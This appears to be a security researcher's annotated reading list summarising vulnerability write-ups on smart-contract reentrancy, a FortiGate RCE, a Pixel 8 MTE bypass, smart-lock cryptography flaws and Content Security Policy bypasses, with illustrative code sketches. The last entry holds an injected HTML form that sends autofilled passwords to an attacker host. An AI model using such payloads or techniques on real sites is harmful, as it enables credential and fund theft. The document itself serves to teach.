Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Cronos Reentrancy Bug- 1375

Father Goose    Reference →Posted 1 Year Ago
  • Cronos is a Cosmos-based chain that uses Ethermint as its smart contract runtime. It has the largest TVL in the Cosmos ecosystem.
  • Reentrancy is a vulnerability class where a user executes some smart contract functionality, makes an external call while the state is only partially updated, then abuses that partially updated state. It is a bug class especially common in Solidity.
  • Within the TectonicStakingPoolV3, a user can call the function performConversionForTokens() with a path of different tokens. However, this function has neither a token allowlist nor reentrancy protection.
  • Using the lack of protections, an attacker can stake their balance partway through the swap path. Why is this bad? The contract calls balanceOf for TONIC on itself both before and after the swap and credits the caller with the difference, so any TONIC sent in mid-swap is treated as swap output.
  • By calling stake() partway through the execution, an attacker can send in tokens as part of the stake. These tokens get counted both as the stake and as swap proceeds, a double use of the same TONIC. By repeating this over and over, it's possible to steal almost all of the funds from the protocol.
  • The response from Cronos is why this caught my attention. Cronos deemed that, since the protocol had a 10-day waiting period and they had sufficient monitoring in place, this wasn't a risk. So, instead of a large payout, they were going to give the reporter 2K and move on. Immunefi rejected this, claimed it deserved a max payout, then kicked Cronos off the platform when they refused.
  • To me, 2K is too low but a max payout is too high. Defense-in-depth measures need to be taken into consideration. The timelock is enough for me to lower the impact, but it should still be a high or a low critical.
  • I don't like the precedent of treating private monitoring tools as a silver bullet: 1) they can't be audited and 2) how do we know that people will respond to them correctly? Regardless, good finding, and it's a bummer that they didn't pay out for this.
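The balance-delta accounting flaw above can be sketched in a few lines. This is a minimal Python simulation with hypothetical names, not the actual TectonicStakingPoolV3 code:

```python
class VulnerablePool:
    """Toy model of the pool; credits swap output via a balance delta."""

    def __init__(self):
        self.tonic_balance = 0   # TONIC held by the pool contract
        self.credited = {}       # swap proceeds credited per user
        self.staked = {}         # stake balances per user

    def stake(self, user, amount):
        # Transfers TONIC in and records the stake. Callable mid-swap
        # because there is no reentrancy guard.
        self.tonic_balance += amount
        self.staked[user] = self.staked.get(user, 0) + amount

    def perform_conversion(self, user, swap_output, reenter=None):
        before = self.tonic_balance
        self.tonic_balance += swap_output   # the swap pays out TONIC
        if reenter:
            reenter()                       # attacker reenters here
        after = self.tonic_balance
        # Bug: everything received since `before` counts as swap output.
        self.credited[user] = self.credited.get(user, 0) + (after - before)

pool = VulnerablePool()
pool.perform_conversion("alice", 100)       # honest: 100 in, 100 credited
assert pool.credited["alice"] == 100

# Attack: reenter stake(50) mid-swap; the 50 TONIC is counted both as a
# stake and as swap proceeds.
pool.perform_conversion("eve", 100, reenter=lambda: pool.stake("eve", 50))
assert pool.staked["eve"] == 50 and pool.credited["eve"] == 150
```

Repeating the reentrant call compounds the phantom credit, which is how the drain scales.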

Discovering Non-Deterministic Behavior in Provenance Blockchain and Cosmos SDK- 1374

Provenance Blockchain Foundation    Reference →Posted 2 Years Ago
  • Different nodes in a blockchain must always arrive at the same state for the network to work. If the network is split in some way, then it will not be able to come to consensus, taking the entire chain down. On the Provenance testnet, they noticed that the app hash differed between nodes. So, what happened?
  • Using their block explorer, the final call was an authz-wrapped MarkerTransferAuthorization. So, the bank, authz, auth and marker modules were the only possible culprits here.
  • The Cosmos SDK has a tool just for this type of issue: iaviewer, for reviewing the IAVL tree for state changes. Using this tool, they diffed the two different chain states, which produced some results.
  • The IAVL tree is just a rebalancing binary tree, so its shape should change for each new node that is added. The good node wrote an authz grant to the state store but the bad node did not. So, the bug had to be on the authz grant side.
  • When setting up the grant, the code used Go's time.Now() value. Yikes! A big source of non-determinism. Nodes that upgraded sooner were fine on these grants, but some nodes that came online later after the upgrade would have this grant creation fail! At the end of the day, this was actually an issue with the Cosmos SDK itself.
  • An interesting post on debugging a Cosmos blockchain app hash issue. I bet I'll see this in the future, so it was a super helpful post for me!
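The non-determinism can be illustrated with a toy app-hash computation. Assuming, as the post describes, that the bug boils down to stamping state with wall-clock time instead of consensus block time (the serialization here is invented for illustration):

```python
import hashlib
import time

def grant_bytes(expiration):
    # Serialize an authz-style grant; only the expiration matters here.
    return b"grant:" + repr(expiration).encode()

def app_hash(entries):
    # Stand-in for the hash over the IAVL state store.
    return hashlib.sha256(b"".join(entries)).hexdigest()

# Non-deterministic: each validator stamps the grant with its own wall
# clock, as the buggy time.Now() code path did.
hash_a = app_hash([grant_bytes(time.time())])
time.sleep(0.01)
hash_b = app_hash([grant_bytes(time.time())])
assert hash_a != hash_b        # app hash mismatch -> consensus halt

# Deterministic fix: every validator uses the block time from consensus.
block_time = 1700000000
hash_a = app_hash([grant_bytes(block_time)])
hash_b = app_hash([grant_bytes(block_time)])
assert hash_a == hash_b        # identical state on every node
```

Anything a node reads from its local environment (clock, filesystem, map iteration order) is a candidate for exactly this class of app hash divergence.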

Two Bytes is Plenty: FortiGate RCE with CVE-2024-21762- 1373

AssetNote    Reference →Posted 2 Years Ago
  • FortiGate is a network security appliance that provides an SSL VPN. Fortinet recently disclosed a vulnerability in the firmware that could lead to RCE. So, the authors of this post diffed the two versions, found the bug and exploited it.
  • First, they obtained the newest and a previous version of the firmware from somewhere (likely online). Once they had decompiled the code, they looked for changes in different locations. One that caught their eye was an HTTP parsing change.
  • In particular, there were changes to the number of chunks allowed in transfer-encoding and to the size of these chunks. So, with this, they had a potential vulnerability. After some experimentation with these values, they got a crash. What was the crash about? The value 0x0a0d could be written to an arbitrary offset on the stack.
  • The debugging environment was interesting to me. The standard shell was very restricted and various protections were in place to prevent changes. After reviewing the /bin/init binary, they found a signature check being performed but assumed there were more checks inside. So, they patched the function do_halt() to not exit.
  • For the kernel checks, they modified the kernel build to allow debugging with GDB. In GDB, they found the check, wrote a script to set up a breakpoint, then specified a proper return value. From there, they copied over a bunch of binaries to make their life easier.
  • The primitive was only a two-byte write of 0x0a0d to an arbitrary address on the stack. With this, return addresses, saved base pointers and locals did not seem like viable paths to hit. So, they decided to target a heap address on the stack that contained function pointers.
  • The binary didn't have PIE enabled. So, they used this static address alongside heap spraying to reference the system function. Eventually, they got this working with a payload to run one of the limited commands in the shell. They eventually came up with a more complicated ROP chain to get a shell, though.
  • Overall, an interesting post! Taking a seemingly difficult primitive to code execution is pretty nice!
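For reference, the chunked transfer-encoding shape that the patched parser limits looks like this. A Python sketch of a probe that varies chunk count and size; the endpoint and exact trigger values are assumptions, not the published exploit:

```python
# Hypothetical probe; the endpoint and parameters are assumptions, not
# the trigger from the post.

def chunked_body(chunk_size, chunk_count):
    # Each chunk: "<hex length>\r\n<data>\r\n"; the body ends with a
    # zero-length chunk.
    body = b""
    for _ in range(chunk_count):
        body += b"%x\r\n" % chunk_size + b"A" * chunk_size + b"\r\n"
    return body + b"0\r\n\r\n"

def request(chunk_size, chunk_count):
    return (b"POST /probe HTTP/1.1\r\n"
            b"Host: target\r\n"
            b"Transfer-Encoding: chunked\r\n"
            b"\r\n" + chunked_body(chunk_size, chunk_count))

# The patch capped both chunk count and chunk size, so a fuzzing loop
# would sweep both dimensions looking for the crash.
req = request(chunk_size=16, chunk_count=4)
assert req.endswith(b"0\r\n\r\n")
assert b"Transfer-Encoding: chunked" in req
```

The 0x0a0d value from the crash is the CRLF chunk delimiter interpreted as a little-endian 16-bit integer, which is why that particular two-byte pattern ends up in the out-of-bounds write.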

Ahhhh i'm liquidating!- 1372

riptide    Reference →Posted 2 Years Ago
  • Deri is a derivatives protocol on various EVM platforms. Users can add/remove margin, trade and use other functionality through the Gateway contract.
  • When removing margin, the user calls requestRemoveMargin(), which emits an event for a bot to see. Once the bot sees it, it calls finishRemoveMargin() with the signed event data and a signature to finalize the request.
  • In total, there are three finishing calls: finishRemoveMargin, finishUpdateLiquidity and finishLiquidate. The former two call an internal function, _checkRequestId, to increment the nonce and prevent replay attacks.
  • This crucial check is missing from finishLiquidate(). However, since the position NFT would already have been burned, a replay would have failed anyway. So, no issue, right?
  • What if we called one of the other functions? When decoding the signed information, there is NO check that it was intended for the function being called. During the actual value decoding, the original signed data has less information, which I would have assumed would cause a revert for not having enough data.
  • The first two values are the same. But the cumulativePnlOnEngine field in the liquidate struct lines up with the requiredMargin field. Since the signature verification happened in the previous call, there is no validation on any of these values!
  • The liquidation value gets scaled up to an insane amount. Additionally, other parts of the protocol have key invariants broken, allowing for more attacks. The potential loss was estimated at 500K-1.5M, but with a bug bounty of only 10K, they reported the bug and moved on.
  • The signatures had two flaws. First, the missing nonce increment. Second, the signature could be used on more than one call. I was also surprised that abi.decode() didn't fail with the different data lengths. Overall, good finding with a fun write-up!
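The field aliasing at the heart of this can be modeled with fixed-width structs. This is a simplification of real ABI encoding, with field names taken from the write-up:

```python
import struct

# Simplified fixed-width layout instead of real ABI encoding.

# Data signed for a finishRemoveMargin request:
#   (account, nonce, requiredMargin)
signed = struct.pack(">QQQ", 0xA11CE, 7, 1_000_000)

# finishRemoveMargin's view of the payload:
account, nonce, required_margin = struct.unpack(">QQQ", signed)

# finishLiquidate decodes the SAME bytes as
#   (account, nonce, cumulativePnlOnEngine).
# Nothing binds the signature to a particular function, so the third
# field silently aliases requiredMargin.
account2, nonce2, cumulative_pnl = struct.unpack(">QQQ", signed)

assert (account2, nonce2) == (account, nonce)
assert cumulative_pnl == required_margin == 1_000_000
```

The usual fix is to include a function or message-type identifier inside the signed payload, so a signature for one call reverts when fed to another.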

Gaining kernel code execution on an MTE-enabled Pixel 8- 1371

Man Yue Mo    Reference →Posted 2 Years Ago
  • Memory Tagging Extensions (MTE) is a memory corruption protection that was widely considered a killer of these types of bugs. The idea is to use the upper bits of a 64-bit pointer to hold a random tag. If the tag of the memory is different from the tag of the pointer being used, a fault occurs, stopping the exploit.
  • The author of this post bought a Pixel 8, enabled MTE then tried to find a vulnerability that would work around these protections. They ended up targeting the JIT memory of the Arm Mali GPU driver.
  • When accessing a page that doesn't have a valid memory mapping, the GPU will increase the size of the space. However, there isn't proper locking when this occurs, so a race condition allows an invalid state to be created, causing pseudo-memory corruption.
  • Using some black magic, it's possible to mess with the mappings of the JIT memory. In particular, a section of memory can be treated as unmapped, even though it really isn't. Since the section is freed, it can be allocated as a standard kernel memory allocation.
  • Eventually, using some allocation magic, it's possible to get this memory to be used in the kernel (including kernel code) but still available to the GPU. Now, it's possible to rewrite the kernel from the GPU in order to compromise everything.
  • So, how does this bypass MTE? Well, there's no memory corruption! The pages array in the kernel and the GPU mappings of the JIT are valid from a memory corruption perspective. Since these accesses go to physical pages, the MTE protections are not in play.
  • Overall, an interesting look into how some bugs do not care about MTE. The post goes too deep into the weeds of GPUs and the kernel for me to fully understand, but it's interesting to get the generic flow nonetheless.
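As a mental model of what MTE normally catches, here is a toy tag check in Python (conceptual only; real MTE keeps the tag in pointer bits 56-59 and tags 16-byte memory granules). The exploit above sidesteps this entirely because no mistagged pointer is ever dereferenced:

```python
# Conceptual model of an MTE-style tag check, not real hardware behavior.

TAG_SHIFT = 56
ADDR_MASK = (1 << TAG_SHIFT) - 1
GRANULE = 16

def tag_pointer(addr, tag):
    # Store the tag in the otherwise-unused upper bits of the pointer.
    return (tag << TAG_SHIFT) | addr

def load(memory_tags, ptr):
    tag, addr = ptr >> TAG_SHIFT, ptr & ADDR_MASK
    if memory_tags.get(addr // GRANULE) != tag:
        raise MemoryError("tag check fault")  # corrupted pointer trapped
    return addr

tags = {0x1000 // GRANULE: 0xA}     # memory at 0x1000 carries tag 0xA
good = tag_pointer(0x1000, 0xA)
assert load(tags, good) == 0x1000   # matching tag: access allowed

bad = tag_pointer(0x1000, 0x3)      # stale/guessed tag, e.g. use-after-free
faulted = False
try:
    load(tags, bad)
except MemoryError:
    faulted = True
assert faulted
```

The Mali bug never produces a `bad`-style pointer: every access uses correctly tagged, validly mapped memory, so the tag check has nothing to object to.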

Top-10 Vulnerabilities in Substrate-based Blockchains Using Rust- 1370

Bloqarl    Reference →Posted 2 Years Ago
  • Substrate is a framework, written in Rust, for building application-specific blockchains within the Polkadot ecosystem. Each new chain inherits the security of the main chain, which is why it's a good choice. It's used by Manta, Band Protocol and many others.
  • Since the Substrate layer requires a lot of code to be written, there are common security issues that occur, some of which are covered in this article. A few of these, such as insecure randomness, are the same as on other chains, so I won't cover them in my notes.
  • Substrate requires a model for charging for storage usage. If the rental rate for the space isn't expensive enough, it's possible to make the system sluggish. In particular, hackers should check that the gas costs correspond to the storage that was used. There is a similar issue, Insufficient Benchmarking, for external calls as well.
  • The second interesting issue is an arbitrary decoding vulnerability. When passing in data that can decode to anything, a highly nested structure can cause performance issues.
  • Cross Consensus Messaging (XCM) is a mechanism for communicating between different Substrate systems, similar to IBC in Cosmos. If the actions coming in through this sink are not carefully sanitized and considered, arbitrary Transact instructions could be executed. In theory, this would lead to unauthorized actions or system disruption.
  • The other issues mentioned are integer-related bugs, replay attacks from unchecked nonces and various other things. My biggest takeaway is that this functionality is very similar to Cosmos but in a different ecosystem. I wish actual findings from Substrate blockchain audits were referenced here, though.
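The arbitrary-decoding hazard can be sketched as an unbounded recursive decoder versus a depth-limited one. This is illustrative only; Substrate's SCALE codec differs in detail:

```python
# Toy format: byte 0x01 means "one more level of nesting", 0x00 is a leaf.

def decode_unbounded(data, pos=0):
    # Recursion depth is fully attacker-controlled.
    if data[pos] == 1:
        inner, pos = decode_unbounded(data, pos + 1)
        return [inner], pos
    return None, pos + 1

def decode_limited(data, pos=0, depth=0, max_depth=32):
    # Defensive variant: refuse pathological nesting up front.
    if depth > max_depth:
        raise ValueError("nesting too deep")
    if data[pos] == 1:
        inner, pos = decode_limited(data, pos + 1, depth + 1, max_depth)
        return [inner], pos
    return None, pos + 1

payload = bytes([1] * 100 + [0])    # 100 levels of attacker-chosen nesting
value, end = decode_unbounded(payload)   # stack/CPU grows with the input
assert end == len(payload)

rejected = False
try:
    decode_limited(payload)
except ValueError:
    rejected = True
assert rejected                     # bounded decoder refuses the payload
```

The unbounded version does work here, but its cost scales linearly (and its stack usage with it) in attacker-supplied input, which is exactly the performance hazard the article describes.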

Discovery of Reentrancy in ERC4626 Vault- 1369

hoshiyari420    Reference →Posted 2 Years Ago
  • The backstory of how vulnerabilities were discovered is always fascinating to me. The vulnerability itself is cool, but I want to be able to reproduce the research process to find my own bugs rather than just learn the individual vulnerability.
  • While auditing a project, they were concerned about the ERC-4626 vaults it integrated with. As a result, they decided to look into them. One of the vaults was violating CEI (checks-effects-interactions). Were there more vaults?
  • When calling withdraw() to transfer ETH, totalAssets was being updated after this call. So, the classic reentrancy was on!
  • To exploit the reentrancy, the author of the Twitter thread has a nice diagram. The basic idea is to get more and more of the assets with burning less and less of the shares. Eventually, this can be used to drain all of the assets, since the ratio of assets to shares gets broken.
  • With a vulnerability on a live project, what do you do? The author decided to hop into their Discord and reach out to them. After not getting a response in 5 minutes, they reached out to the SEAL-911 Telegram bot, which responded within 2 minutes. Through trusted channels, contact had been made with the protocol by the 20-minute mark.
  • 30 minutes later, they fixed the vulnerability and deployed the code. In the end, only 51 minutes passed between starting the reporting process and the deployed fix. That's incredibly fast!
  • Overall, it's a great find! But two things stick out to me. First, looking for issues in code that your client uses but doesn't own feels strange to me. Is that really a good use of their time? To me, it feels out of scope, even if there is impact.
  • The second thing was the response time. When the author didn't get a response in the Discord within 5 minutes, they reached out through alternative means. To me, this feels a tad aggressive and fast. If the vulnerability has been there for a year, what are the odds that an attacker is going to find and exploit the issue at the same time if you spend a few extra hours waiting? Probably none, but I appreciate the desire to get this fixed for the protocol.
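The CEI violation can be modeled as a vault that sends assets before burning shares, letting a reentrant deposit() mint at an artificially low share price. A hypothetical Python simplification of the thread's diagram, not the audited code:

```python
class Vault:
    """ERC-4626-style vault that violates CEI in withdraw()."""

    def __init__(self):
        self.balance = 0          # ETH actually held == totalAssets
        self.total_shares = 0
        self.shares = {}

    def deposit(self, user, assets):
        # Mint shares at the current assets/shares ratio.
        minted = assets if self.total_shares == 0 else \
            assets * self.total_shares // self.balance
        self.balance += assets
        self.total_shares += minted
        self.shares[user] = self.shares.get(user, 0) + minted
        return minted

    def withdraw(self, user, burn, callback=None):
        assets = burn * self.balance // self.total_shares
        self.balance -= assets    # interaction first: the ETH leaves...
        if callback:
            callback()            # ...and the receiver can reenter here
        self.total_shares -= burn # effects last: shares burned too late
        self.shares[user] -= burn
        return assets

v = Vault()
v.deposit("lp", 1000)
v.deposit("eve", 500)

# Reenter deposit() while the withdrawn ETH is gone but eve's 500 shares
# are not yet burned: the share price is artificially low.
out = v.withdraw("eve", 500, callback=lambda: v.deposit("eve", 500))
assert v.shares["eve"] == 750          # 500 assets minted 750 shares

redeemed = v.withdraw("eve", 750)
assert out + redeemed > 1000           # eve paid in 1000, took out more
```

Each round skews the assets-to-shares ratio a bit further at the honest LP's expense, which is the "more assets for fewer shares" spiral the thread describes.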

Say Friend and Enter: Digitally lockpicking an advanced smart lock (Part 2: discovered vulnerabilities) - 1368

Aleph Security    Reference →Posted 2 Years Ago
  • Locks controlled by computers are great, until you realize that they are subject to security vulnerabilities like everything else. This post goes through hacking a smart lock with various techniques. The system has a single global AES key that is used to communicate with the lock. Although there are client-side protections for giving and taking keys, since attackers have the AES key, these don't matter.
  • The authors realized that a MitM attack could capture an encryption challenge and response by spoofing the lock's information, since the lock will only hold a single connection at a time. By having our device hold that connection open, we can advertise our fake lock and get a victim's app to connect to it instead. The authentication process uses a challenge to communicate with the lock.
  • This challenge value is only a 16-bit integer. By trying to authorize with our encrypted message from the MitM, we have a 1/65536 chance per attempt; sending back the matching challenge response makes us authenticated! Each attempt takes several seconds, so the whole process takes several days.
  • When performing the decryption of the AES-encrypted data, the code needs to know how many iterations to do. To find this out, it takes the length of the buffer and divides it by 16. However, it doesn't check that the length is a multiple of 16. So, by sending a length not divisible by 16, such as 15, the decryption won't occur on those bytes. What does this mean? We can trick the process into treating our plaintext data as decrypted. Abusing a different authentication path, we can use this vulnerability to trick the authentication process.
  • The app has an original version of the protocol. With this, the only encryption is a 1 byte repeating XOR key, such as 0xABAB.... It's possible to downgrade a user with a MitM to force this version of the protocol. Again, amazing.
  • The lock has another device called a gateway. This is used for internet communication. By spoofing a MAC address when talking to a server, it's possible to force a re-registration to reset some parts of the key material. This does require knowing the MAC address, which is difficult to get.
  • There is support for a wireless keypad that connects to the lock. Since the communication key for this is initially hardcoded, all users can send data here, no problem. They can then send key presses over a single connection, which speeds up brute forcing drastically. The code uses the strstr function as well, so de Bruijn sequences can be used to make this even more efficient. There is a lockout for failed attempts here, though.
  • There is a second Bluetooth service being advertised. This literally allows for updating the firmware without any signature checks. That's game over.
  • Most of the time, debug ports are good for reverse engineering. In this case, the debug port is on the part of the board that is on the inside of the lock. So, if an attacker drilled a small hole in the lock, they could communicate with the debug port. With debug access, they would have complete control over the lock.
  • There are many, many classic cryptography issues within this. Downgrade attacks, brute forcing... many awesome things! This also shows that cryptography isn't always crazy complicated; just understanding some basics is helpful for exploitation.
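The decryption-length bug is easy to demonstrate. A sketch with XOR standing in for the real AES block cipher (the flaw is in the iteration count, not the cipher):

```python
BLOCK = 16

def buggy_decrypt(buf, key):
    # iterations = len(buf) // BLOCK, with no check that the length is a
    # multiple of BLOCK; XOR stands in for the real AES block cipher.
    out = bytearray(buf)
    for i in range(len(buf) // BLOCK):
        for j in range(BLOCK):
            out[i * BLOCK + j] ^= key[j]
    return bytes(out)

key = bytes(range(BLOCK))

# A full block really is transformed (XOR is its own inverse here):
assert buggy_decrypt(buggy_decrypt(b"A" * BLOCK, key), key) == b"A" * BLOCK

# 15 bytes -> 15 // 16 == 0 iterations: our plaintext passes straight
# through and is then processed as though it had been decrypted.
plaintext_cmd = b"OPEN-SESAME-123"   # hypothetical 15-byte command
assert len(plaintext_cmd) == 15
assert buggy_decrypt(plaintext_cmd, key) == plaintext_cmd
```

A length check (`len(buf) % BLOCK == 0`) before the loop, or rejecting any trailing remainder, closes the hole.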

GitHub’s CSP journey- 1367

Patrick Toomey     Reference →Posted 2 Years Ago
  • The Content Security Policy (CSP) is a mechanism for restricting various components of a web page to prevent attacks. GitHub revamped their CSP in 2016, and this is their article explaining how they did it.
  • First, they restricted script-src to only allow content from their CDN. They removed 'self' from the list (which I thought would be fine on the page, tbh), which removed some weird edge cases: in particular, MIME sniffing issues in the browser and weird JSONP endpoints.
  • The next thing they restricted was object-src (used for embeds), removing 'self' there as well. They removed it because of a researcher who found a CSP bypass through it. The hacker had found a content injection bug that allowed them to control the class attribute, with some automatic behavior from JavaScript fetching the href associated with the element. By combining this with a content sniffing issue and a Chrome browser bug, they were able to get Flash code to execute within the embed.
  • They locked down img-src much further as well. Why is this important? Dangling markup issues can allow parts of a page to be sent in a URL if the source of an image isn't carefully considered. In a newer post of theirs, Cure53 found a way to abuse dangling markup on Google Analytics and another website to exfiltrate information.
  • connect-src restricts which domains can actually be connected to for fetch, WebSockets and other things. This limits various attacks by inherently not allowing interactions with the outside world.
  • form-action can be used to restrict where forms can be submitted. Against attacks that abuse password manager autofill or dangling markup, this can be very useful. They have a few more restrictions on iframes as well, which is always a good thing.
  • Overall, an interesting dissection of CSP security and how GitHub made theirs much more robust. Even though the article is quite old, it's still a great resource.
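Put together, a policy in the spirit of these directives might look like the following. This is an illustrative example with made-up hostnames, not GitHub's actual header (which is also sent as a single line; it is folded here for readability):

```http
Content-Security-Policy:
    default-src 'none';
    script-src https://assets.example-cdn.com;
    object-src 'none';
    img-src https://assets.example-cdn.com https://avatars.example.com;
    connect-src 'self';
    form-action 'self';
    frame-ancestors 'none'
```

Starting from `default-src 'none'` and allowlisting each resource type individually is the pattern the article's journey converges on.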

Using form hijacking to bypass CSP- 1366

Gareth Heyes    Reference →Posted 2 Years Ago
  • Content Security Policies (CSP) are a secondary line of defense against XSS bugs in the browser. So, as an attacker, having ways to circumvent the CSP is important for a full exploit chain.
  • Form hijacking applies when you have an HTML injection vulnerability but can't escalate it to XSS because of the CSP. By adding a form to the page, it may be possible to extract sensitive data, especially from over-eager password managers.
  • In the case of Mastodon, this worked to steal passwords with Chrome and a single user click. Here, Gareth gave the injected inputs an opacity of zero to make them invisible.
  • form-action was added as a directive in CSPv2. However, default-src doesn't cover form actions for some reason. Overall, an interesting CSP bypass that will probably exist for a while.
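A hypothetical injected payload (not Gareth's actual Mastodon markup) shows the idea: with script-src locked down but no form-action directive, an injected form plus browser autofill can leak credentials on a single click:

```html
<!-- Hypothetical injected markup; the attacker domain is invented. -->
<form action="https://attacker.example/steal" method="POST">
  <!-- opacity:0 hides the fields; the password manager fills them anyway -->
  <input name="username" autocomplete="username" style="opacity:0">
  <input name="password" type="password" autocomplete="current-password"
         style="opacity:0">
  <button type="submit" style="opacity:0">Click me</button>
</form>
```

No script runs at any point, which is why a script-src-only CSP never notices; only `form-action` (or avoiding the HTML injection in the first place) stops the submission.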